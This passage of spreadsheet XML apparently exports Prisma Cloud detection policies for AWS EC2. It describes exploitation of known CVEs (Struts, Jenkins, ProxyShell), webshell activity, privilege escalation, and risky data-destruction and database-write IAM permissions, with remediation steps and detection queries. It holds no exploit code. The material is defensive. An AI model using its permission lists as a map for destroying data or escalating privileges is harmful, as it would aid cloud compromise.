      <c r="Q1789" t="inlineStr"/>
      <c r="R1789" t="inlineStr"/>
      <c r="S1789" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1789" t="b">
        <v>0</v>
      </c>
      <c r="U1789" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1789" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1789" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2023-50164) in applications running on AWS EC2 resources. The presence of CVE-2023-50164 in the application indicates a critical security risk that could allow attackers to perform directory traversal attacks, leading to unauthorized access to system files and performing arbitary code execution.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2023-50164 could lead to significant security incidents, including unauthorized access to sensitive data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CVE-2023-50164 vulnerability on affected AWS EC2 instances.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1789" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-50164
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-50164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1789" t="inlineStr"/>
      <c r="Z1789" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'aws-ec2-describe-instances' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-50164 - Apache Struts Directory Traversal) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-50164'))</t>
        </is>
      </c>
      <c r="AA1789" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1789" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:27</t>
        </is>
      </c>
      <c r="AC1789" t="inlineStr"/>
      <c r="AD1789" t="b">
        <v>1</v>
      </c>
      <c r="AE1789" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1789" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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89" t="inlineStr">
        <is>
          <t>b73e497f-de25-474a-a4b7-52a21532f1d8</t>
        </is>
      </c>
      <c r="AI1789" t="inlineStr">
        <is>
          <t>4c976913-35da-4f2d-b256-38f53452e3fe</t>
        </is>
      </c>
      <c r="AJ1789" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1789" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" t="inlineStr"/>
      <c r="B1790" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1790" s="2" t="inlineStr"/>
      <c r="D1790" t="inlineStr"/>
      <c r="E1790" t="inlineStr"/>
      <c r="F1790" t="inlineStr"/>
      <c r="G1790" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1790" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1790" t="inlineStr">
        <is>
          <t>Potentially nefarious webshell activity detected on a publicly exposed and vulnerable AWS EC2 instance with risky privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1790" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1790" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1790" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1790" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1790" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1790" t="inlineStr"/>
      <c r="R1790" t="inlineStr"/>
      <c r="S1790" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1790" t="b">
        <v>0</v>
      </c>
      <c r="U1790" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1790" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1790" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities, risky privilege escalation permissions, and webshell activity.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Webshell is a shell-like interface that enables a web server to be remotely accessed, often it enables threat actors to compromise web servers and launch additional attacks. An attacker with access to the privilege escalation permissions can elevate the access of the EC2 instance, expanding the surface of the attack and granting access to cloud resources with sensitive information. 
This policy checks for the following privilege escalation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investigate Webshell activity and grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible</t>
        </is>
      </c>
      <c r="X179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90" t="inlineStr"/>
      <c r="Z1790" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name = (('AWS EC2 instance with network path from the internet (0.0.0.0/0)' and 'AWS EC2 instance with privilege escalation risk permissions') and ('Traffic from a suspicious IP address associated with Webshell activity' or 'Traffic to a suspicious IP address associated with Webshell activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1790" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1790" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC1790" t="inlineStr"/>
      <c r="AD1790" t="b">
        <v>1</v>
      </c>
      <c r="AE1790" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1790" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>f876391e-210f-43ba-9e10-f54f45982901</t>
        </is>
      </c>
      <c r="AI1790" t="inlineStr">
        <is>
          <t>4296acea-a02e-4435-a9f0-33b324580fca</t>
        </is>
      </c>
      <c r="AJ1790" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1790" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" t="inlineStr"/>
      <c r="B1791" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1791" s="2" t="inlineStr"/>
      <c r="D1791" t="inlineStr"/>
      <c r="E1791" t="inlineStr"/>
      <c r="F1791" t="inlineStr"/>
      <c r="G1791" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1791" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1791" t="inlineStr">
        <is>
          <t>Stored Cross Site Scripting risk due to publicly exposed and vulnerable AWS EC2 instance [Jenkins, CVE-2023-27898]</t>
        </is>
      </c>
      <c r="L1791" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1791" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1791" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1791" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1791" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1791" t="inlineStr"/>
      <c r="R1791" t="inlineStr"/>
      <c r="S1791" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1791" t="b">
        <v>0</v>
      </c>
      <c r="U1791" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1791" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1791" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable stored cross-site scripting vulnerability [CVE-2023-27898].
Stored cross-site scripting vulnerability poses a significant threat by allowing attackers to inject malicious scripts into web applications, which can potentially lead to unauthorized data access, session hijacking, and other security breaches. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Jenkins [CVE-2023-27898] vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X179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CVE-2023-27898
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-27898</t>
        </is>
      </c>
      <c r="Y1791" t="inlineStr"/>
      <c r="Z1791" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-27898'))</t>
        </is>
      </c>
      <c r="AA1791" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1791" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1791" t="inlineStr"/>
      <c r="AD1791" t="b">
        <v>1</v>
      </c>
      <c r="AE1791" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1791" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>3c91da62-f794-4cb5-a3ff-318c8af14ebf</t>
        </is>
      </c>
      <c r="AI1791" t="inlineStr">
        <is>
          <t>41966192-8cf5-4c14-a190-304573e33bdf</t>
        </is>
      </c>
      <c r="AJ1791" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1791" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" t="inlineStr"/>
      <c r="B1792" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1792" s="2" t="inlineStr"/>
      <c r="D1792" t="inlineStr"/>
      <c r="E1792" t="inlineStr"/>
      <c r="F1792" t="inlineStr"/>
      <c r="G1792" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1792" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1792" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance [Linux Kernel, CVE-2022-47939]</t>
        </is>
      </c>
      <c r="L1792" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1792" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1792" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1792" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1792" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1792" t="inlineStr"/>
      <c r="R1792" t="inlineStr"/>
      <c r="S1792" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1792" t="b">
        <v>0</v>
      </c>
      <c r="U1792" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1792" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1792" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-47939].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Linux [CVE-2022-47939] vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible</t>
        </is>
      </c>
      <c r="X179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CVE-2022-47939
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-47939</t>
        </is>
      </c>
      <c r="Y1792" t="inlineStr"/>
      <c r="Z1792" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-47939'))</t>
        </is>
      </c>
      <c r="AA1792" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1792" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1792" t="inlineStr"/>
      <c r="AD1792" t="b">
        <v>1</v>
      </c>
      <c r="AE1792" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1792" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>a9f74845-0491-4fce-ade4-205f8ce7a489</t>
        </is>
      </c>
      <c r="AI1792" t="inlineStr">
        <is>
          <t>77006629-2324-4ad0-b7c2-851fdd82e936</t>
        </is>
      </c>
      <c r="AJ1792" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1792" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" t="inlineStr"/>
      <c r="B1793" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1793" s="2" t="inlineStr"/>
      <c r="D1793" t="n">
        <v>15</v>
      </c>
      <c r="E1793" t="n">
        <v>0</v>
      </c>
      <c r="F1793" t="n">
        <v>0</v>
      </c>
      <c r="G1793" t="b">
        <v>1</v>
      </c>
      <c r="H17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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1793" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1793" t="inlineStr">
        <is>
          <t>Unauthorized critical database service modifications risk due to a publicly exposed and vulnerable AWS EC2 instance with database management 'write' permissions</t>
        </is>
      </c>
      <c r="L1793" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1793" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1793" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1793" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1793" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1793" t="inlineStr"/>
      <c r="R1793" t="inlineStr"/>
      <c r="S1793" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1793" t="b">
        <v>0</v>
      </c>
      <c r="U1793" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1793" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1793" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have database management write access permissions. 
Publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. EC2 instance with database management write access permissions could further expand the surface of the attack and grant unauthorized modifications to critical database services hosted on AWS. 
This policy checks for the following risky database management write access permissions: 
'rds:ModifyDBCluster', 'rds:ModifyDBClusterEndpoint', 'rds:ModifyDBInstance', 'rds:ModifyDBSnapshot', 'rds:ModifyGlobalCluster', 'dynamodb:UpdateItem', 'dynamodb:UpdateTable', 'memorydb:UpdateCluster', 'neptune-db:ResetDatabase', 'neptune-db:WriteDataViaQuery', 'docdb-elastic:UpdateCluster', 'elasticache:ModifyCacheCluster', 'cassandra:Alter', 'cassandra:Modify', 'qldb:ExecuteStatement', 'qldb:PartiQLUpdate', 'qldb:SendCommand', 'qldb:UpdateLedger', 'redshift:ModifyCluster', 'redshift:ModifyClusterSnapshot', 'redshift:ModifyEndpointAccess', 'timestream:UpdateDatabase', 'timestream:UpdateTable' , 'timestream:WriteRecords'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1793"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93" t="inlineStr"/>
      <c r="Z1793" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance with database management write access permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1793" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1793" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1793" t="inlineStr"/>
      <c r="AD1793" t="b">
        <v>1</v>
      </c>
      <c r="AE1793" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1793" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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3" t="inlineStr">
        <is>
          <t>e4f041ca-3556-4098-8ac0-18c73ef42697</t>
        </is>
      </c>
      <c r="AI1793" t="inlineStr">
        <is>
          <t>16a96724-66e5-4a4c-bc19-c6c3b2b9e421</t>
        </is>
      </c>
      <c r="AJ1793" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1793" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" t="inlineStr"/>
      <c r="B1794" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1794" s="2" t="inlineStr"/>
      <c r="D1794" t="n">
        <v>6</v>
      </c>
      <c r="E1794" t="n">
        <v>0</v>
      </c>
      <c r="F1794" t="n">
        <v>0</v>
      </c>
      <c r="G1794" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1794" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1794" t="inlineStr">
        <is>
          <t>Data destruction risk due to publicly exposed and vulnerable AWS EC2 instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L1794" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1794" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1794" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1794" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1794" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1794" t="inlineStr"/>
      <c r="R1794" t="inlineStr"/>
      <c r="S1794" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1794" t="b">
        <v>0</v>
      </c>
      <c r="U1794" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1794" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1794" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and data destruction permissions.
Data destruction permissions on publicly exposed EC2 instances with critical or high vulnerabilities may allow an attacker to gain access to the vulnerable instances and leverage that access to delete cloud storage buckets, snapshots and images and destroy sensitive information stored in your cloud resources making irreversible damage to your organization.
This policy checks for the following data destruction permissions:
's3:DeleteBucket', 'rds:DeleteDBCluster', 'rds:DeleteDBInstance', 'rds:DeleteDBSnapshot', 'rds:DeleteDBClusterSnapshot', 'rds:DeleteGlobalCluster', 'ec2:DeleteSnapshot', 'ec2:DeleteVolume'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X179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94" t="inlineStr"/>
      <c r="Z1794" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance with data destruction permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1794" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1794" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1794" t="inlineStr"/>
      <c r="AD1794" t="b">
        <v>1</v>
      </c>
      <c r="AE1794" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1794" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>1efdeb58-de0c-4436-8d6d-a58cabf2a7c2</t>
        </is>
      </c>
      <c r="AI1794" t="inlineStr">
        <is>
          <t>372663bc-cd49-44f1-9efa-b22b65b4c9b3</t>
        </is>
      </c>
      <c r="AJ1794" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1794" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" t="inlineStr"/>
      <c r="B1795" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1795" s="2" t="inlineStr"/>
      <c r="D1795" t="inlineStr"/>
      <c r="E1795" t="inlineStr"/>
      <c r="F1795" t="inlineStr"/>
      <c r="G1795" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1795" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1795" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with privilege escalation permissions</t>
        </is>
      </c>
      <c r="L1795" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1795" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1795" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1795" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1795" t="inlineStr"/>
      <c r="R1795" t="inlineStr"/>
      <c r="S1795" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1795" t="b">
        <v>0</v>
      </c>
      <c r="U1795" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1795" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1795" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and risky IAM permissions that could potentially lead to privilege escalation.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky privilege escalation IAM permissions on the instance further help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation: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risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X179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95" t="inlineStr"/>
      <c r="Z1795" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 instance with privilege escalation risk permissions') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1795" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1795" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1795" t="inlineStr"/>
      <c r="AD1795" t="b">
        <v>1</v>
      </c>
      <c r="AE1795" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1795" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>17ffaaeb-6483-4977-82d6-47466f7ea283</t>
        </is>
      </c>
      <c r="AI1795" t="inlineStr">
        <is>
          <t>9ba25d3c-808e-4b75-98bc-1e4d8863f821</t>
        </is>
      </c>
      <c r="AJ1795" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1795" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" t="inlineStr"/>
      <c r="B1796" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1796" s="2" t="inlineStr"/>
      <c r="D1796" t="inlineStr"/>
      <c r="E1796" t="inlineStr"/>
      <c r="F1796" t="inlineStr"/>
      <c r="G1796" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1796" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1796" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Microsoft ProxyShell, CVE-2021-34473]</t>
        </is>
      </c>
      <c r="L1796" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1796" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1796" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1796" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1796" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1796" t="inlineStr"/>
      <c r="R1796" t="inlineStr"/>
      <c r="S1796" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1796" t="b">
        <v>0</v>
      </c>
      <c r="U1796" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1796" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1796" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Microsoft ProxyShell, CVE-2021-34473]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Microsoft software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Microsoft ProxyShell [CVE-2021-34473] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X1796"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CVE-2021-34473
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-34473</t>
        </is>
      </c>
      <c r="Y1796" t="inlineStr"/>
      <c r="Z1796" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-34473 - ProxyShell) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-34473'))</t>
        </is>
      </c>
      <c r="AA1796" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1796" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:36</t>
        </is>
      </c>
      <c r="AC1796" t="inlineStr"/>
      <c r="AD1796" t="b">
        <v>1</v>
      </c>
      <c r="AE1796" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1796" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>ef069b8b-880c-4e38-825a-241026fc1715</t>
        </is>
      </c>
      <c r="AI1796" t="inlineStr">
        <is>
          <t>9bd0cf83-0b07-4fa7-8cf5-e159709b70d7</t>
        </is>
      </c>
      <c r="AJ1796" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1796" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" t="inlineStr"/>
      <c r="B1797" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1797" s="2" t="inlineStr"/>
      <c r="D1797" t="inlineStr"/>
      <c r="E1797" t="inlineStr"/>
      <c r="F1797" t="inlineStr"/>
      <c r="G1797" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
